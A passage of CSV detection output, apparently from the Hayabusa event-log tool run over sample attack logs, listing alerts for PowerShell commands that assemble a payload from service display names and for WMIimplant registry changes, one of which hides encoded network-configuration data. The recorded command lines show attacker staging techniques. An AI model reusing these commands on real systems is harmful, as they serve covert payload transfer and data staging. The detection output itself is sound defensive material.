0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:40:10.768 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg236"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe58 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:40:12.215 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg237"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x888 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:40:12.215 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg237"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x394 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:40:13.660 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg238"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe24 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:40:13.660 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg238"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc54 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:40:15.098 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg239"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x22c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:40:15.113 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg239"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xf34 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:40:16.552 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg240"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x68c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:40:16.552 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg240"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xdf8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:40:18.002 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg241"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xa4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:40:18.002 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg241"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xb1c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:40:19.468 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg242"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x608 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:40:19.484 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg242"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x874 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:40:20.926 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg243"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xab4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:40:20.942 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg243"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xeb4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:40:22.374 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg244"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xdf0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:40:22.390 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg244"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x944 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:53:41.099 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x580 | User: FS03$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-08 19:26:55.123 +09:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | SetValue: HKLM\System\CurrentControlSet\Control\CrashControl\LogEvent: DWORD (0x00000001) | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1508 | PGUID: A57649D1-1303-6179-D9C8-010000000000",../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx 2021-11-08 19:26:55.123 +09:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | SetValue: HKLM\System\CurrentControlSet\Control\CrashControl\SendAlert: DWORD (0x00000000) | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1508 | PGUID: A57649D1-1303-6179-D9C8-010000000000",../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx 2021-11-08 19:26:55.123 +09:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | SetValue: HKLM\System\CurrentControlSet\Control\CrashControl\CrashDumpEnabled: DWORD (0x00000007) | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1508 | PGUID: A57649D1-1303-6179-D9C8-010000000000",../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx 2021-11-08 19:26:55.123 +09:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | SetValue: HKLM\System\CurrentControlSet\Control\CrashControl\Overwrite: DWORD (0x00000001) | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1508 | PGUID: A57649D1-1303-6179-D9C8-010000000000",../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx 2021-11-08 19:26:55.123 +09:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | SetValue: HKLM\System\CurrentControlSet\Control\CrashControl\KernelDumpOnly: DWORD (0x00000000) | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1508 | PGUID: A57649D1-1303-6179-D9C8-010000000000",../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx 2021-11-08 19:26:55.123 +09:00,fs03vuln.offsec.lan,13,medium,,CrashControl CrashDump Disabled,,../hayabusa-rules/sigma/registry_event/registy_event_crashdump_disabled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx 2021-11-08 19:26:55.123 +09:00,fs03vuln.offsec.lan,13,medium,,CrashControl CrashDump Disabled,,../hayabusa-rules/sigma/registry_event/registy_event_crashdump_disabled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx 2021-11-08 19:26:55.139 +09:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | SetValue: HKLM\System\CurrentControlSet\Control\CrashControl\AutoReboot: DWORD (0x00000001) | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1508 | PGUID: A57649D1-1303-6179-D9C8-010000000000",../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx 2021-11-08 19:26:55.139 +09:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | SetValue: HKLM\System\CurrentControlSet\Control\CrashControl\DumpFile: 87,105,110,100,111,119,115,32,73,80,32,67,111,110,102,105,103,117,114,97,116,105,111,110,13,10,13,10,32,32,32,72,111,115,116,32,78,97,109,101,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,58,32,102,115,48,51,118,117,108,110,13,10,32,32,32,80,114,105,109,97,114,121,32,68,110,115,32,83,117,102,102,105,120,32,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,58,32,111,102,102,115,101,99,46,108,97,110,13,10,32,32,32,78,111,100,101,32,84,121,112,101,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,58,32,72,121,98,114,105,100,13,10,32,32,32,73,80,32,82,111,117,116,105,110,103,32,69,110,97,98,108,101,100,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,58,32,78,111,13,10,32,32,32,87,73,78,83,32,80,114,111,120,121,32,69,110,97,98,108,101,100,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,58,32,78,111,13,10,32,32,32,68,78,83,32,83,117,102,102,105,120,32,83,101,97,114,99,104,32,76,105,115,116,46,32,46,32,46,32,46,32,46,32,46,32,58,32,111,102,102,115,101,99,46,108,97,110,13,10,13,10,69,116,104,101,114,110,101,116,32,97,100,97,112,116,101,114,32,69,116,104,101,114,110,101,116,48,58,13,10,13,10,32,32,32,67,111,110,110,101,99,116,105,111,110,45,115,112,101,99,105,102,105,99,32,68,78,83,32,83,117,102,102,105,120,32,32,46,32,58,32,13,10,32,32,32,68,101,115,99,114,105,112,116,105,111,110,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,58,32,73,110,116,101,108,40,82,41,32,56,50,53,55,52,76,32,71,105,103,97,98,105,116,32,78,101,116,119,111,114,107,32,67,111,110,110,101,99,116,105,111,110,13,10,32,32,32,80,104,121,115,105,99,97,108,32,65,100,100,114,101,115,115,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,58,32,48,48,45,53,48,45,53,54,45,57,55,45,50,66,45,55,55,13,10,32,32,32,68,72,67,80,32,69,110,97,98,108,101,100,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,58,32,78,111,13,10,32,32,32,65,117,116,111,99,111,110,102,105,103,117,114,97,116,105,111,110,32,69,110,97,98,108,101,100,32,46,32,46,32,46,32,46,32,58,32,89,101,115,13,10,32,32,32,76,105,110,107,45,108,111,99,97,108,32,73,80,118,54,32,65,100,100,114,101,115,115,32,46,32,46,32,46,32,46,32,46,32,58,32,102,101,56,48,58,58,99,48,98,100,58,54,57,54,99,58,51,57,54,48,58,97,49,98,49,37,49,50,40,80,114,101,102,101,114,114,101,100,41,32,13,10,32,32,32,73,80,118,52,32,65,100,100,114,101,115,115,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,58,32,49,48,46,50,51,46,52,50,46,51,56,40,80,114,101,102,101,114,114,101,100,41,32,13,10,32,32,32,83,117,98,110,101,116,32,77,97,115,107,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,58,32,50,53,53,46,50,53,53,46,50,53,53,46,48,13,10,32,32,32,68,101,102,97,117,108,116,32,71,97,116,101,119,97,121,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,58,32,49,48,46,50,51,46,52,50,46,49,13,10,32,32,32,68,72,67,80,118,54,32,73,65,73,68,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,58,32,51,48,50,48,49,48,52,53,52,13,10,32,32,32,68,72,67,80,118,54,32,67,108,105,101,110,116,32,68,85,73,68,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,58,32,48,48,45,48,49,45,48,48,45,48,49,45,50,54,45,52,54,45,50,56,45,65,68,45,48,48,45,53,48,45,53,54,45,57,55,45,50,66,45,55,55,13,10,32,32,32,68,78,83,32,83,101,114,118,101,114,115,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,58,32,49,48,46,50,51,46,52,50,46,49,48,13,10,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,49,48,46,50,51,46,52,50,46,49,49,13,10,32,32,32,78,101,116,66,73,79,83,32,111,118,101,114,32,84,99,112,105,112,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,58,32,69,110,97,98,108,101,100,13,10,13,10,84,117,110,110,101,108,32,97,100,97,112,116,101,114,32,105,115,97,116,97,112,46,123,68,54,56,57,48,67,54,52,45,54,67,56,55,45,52,48,54,65,45,65,69,66,56,45,69,51,51,70,53,52,69,53,66,67,56,50,125,58,13,10,13,10,32,32,32,77,101,100,105,97,32,83,116,97,116,101,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,58,32,77,101,100,105,97,32,100,105,115,99,111,110,110,101,99,116,101,100,13,10,32,32,32,67,111,110,110,101,99,116,105,111,110,45,115,112,101,99,105,102,105,99,32,68,78,83,32,83,117,102,102,105,120,32,32,46,32,58,32,13,10,32,32,32,68,101,115,99,114,105,112,116,105,111,110,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,58,32,77,105,99,114,111,115,111,102,116,32,73,83,65,84,65,80,32,65,100,97,112,116,101,114,13,10,32,32,32,80,104,121,115,105,99,97,108,32,65,100,100,114,101,115,115,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,58,32,48,48,45,48,48,45,48,48,45,48,48,45,48,48,45,48,48,45,48,48,45,69,48,13,10,32,32,32,68,72,67,80,32,69,110,97,98,108,101,100,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,58,32,78,111,13,10,32,32,32,65,117,116,111,99,111,110,102,105,103,117,114,97,116,105,111,110,32,69,110,97,98,108,101,100,32,46,32,46,32,46,32,46,32,58,32,89,101,115 | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1508 | PGUID: A57649D1-1303-6179-D9C8-010000000000",../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx 2021-11-08 19:26:55.139 +09:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | SetValue: HKLM\System\CurrentControlSet\Control\CrashControl\MiniDumpDir: %%SystemRoot%%\Minidump | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1508 | PGUID: A57649D1-1303-6179-D9C8-010000000000",../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx 2021-11-08 19:26:59.790 +09:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | SetValue: HKLM\System\CurrentControlSet\Control\CrashControl\LogEvent: DWORD (0x00000001) | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1508 | PGUID: A57649D1-1303-6179-D9C8-010000000000",../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx 2021-11-08 19:26:59.790 +09:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | SetValue: HKLM\System\CurrentControlSet\Control\CrashControl\SendAlert: DWORD (0x00000000) | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1508 | PGUID: A57649D1-1303-6179-D9C8-010000000000",../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx 2021-11-08 19:26:59.790 +09:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | SetValue: HKLM\System\CurrentControlSet\Control\CrashControl\CrashDumpEnabled: DWORD (0x00000007) | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1508 | PGUID: A57649D1-1303-6179-D9C8-010000000000",../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx 2021-11-08 19:26:59.790 +09:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | SetValue: HKLM\System\CurrentControlSet\Control\CrashControl\Overwrite: DWORD (0x00000001) | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1508 | PGUID: A57649D1-1303-6179-D9C8-010000000000",../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx 2021-11-08 19:26:59.790 +09:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | SetValue: HKLM\System\CurrentControlSet\Control\CrashControl\KernelDumpOnly: DWORD (0x00000000) | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1508 | PGUID: A57649D1-1303-6179-D9C8-010000000000",../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx 2021-11-08 19:26:59.790 +09:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | SetValue: HKLM\System\CurrentControlSet\Control\CrashControl\AutoReboot: DWORD (0x00000001) | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1508 | PGUID: A57649D1-1303-6179-D9C8-010000000000",../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx 2021-11-08 19:26:59.790 +09:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | SetValue: HKLM\System\CurrentControlSet\Control\CrashControl\DumpFile: %%SystemRoot%%\MEMORY.DMP | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1508 | PGUID: A57649D1-1303-6179-D9C8-010000000000",../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx 2021-11-08 19:26:59.790 +09:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | SetValue: HKLM\System\CurrentControlSet\Control\CrashControl\MiniDumpDir: %%SystemRoot%%\Minidump | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1508 | PGUID: A57649D1-1303-6179-D9C8-010000000000",../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx 2021-11-08 19:26:59.790 +09:00,fs03vuln.offsec.lan,13,medium,,CrashControl CrashDump Disabled,,../hayabusa-rules/sigma/registry_event/registy_event_crashdump_disabled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx 2021-11-08 19:26:59.790 +09:00,fs03vuln.offsec.lan,13,medium,,CrashControl CrashDump Disabled,,../hayabusa-rules/sigma/registry_event/registy_event_crashdump_disabled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx 2021-11-09 00:01:27.604 +09:00,fs03vuln.offsec.lan,1,high,,Process Created_Sysmon 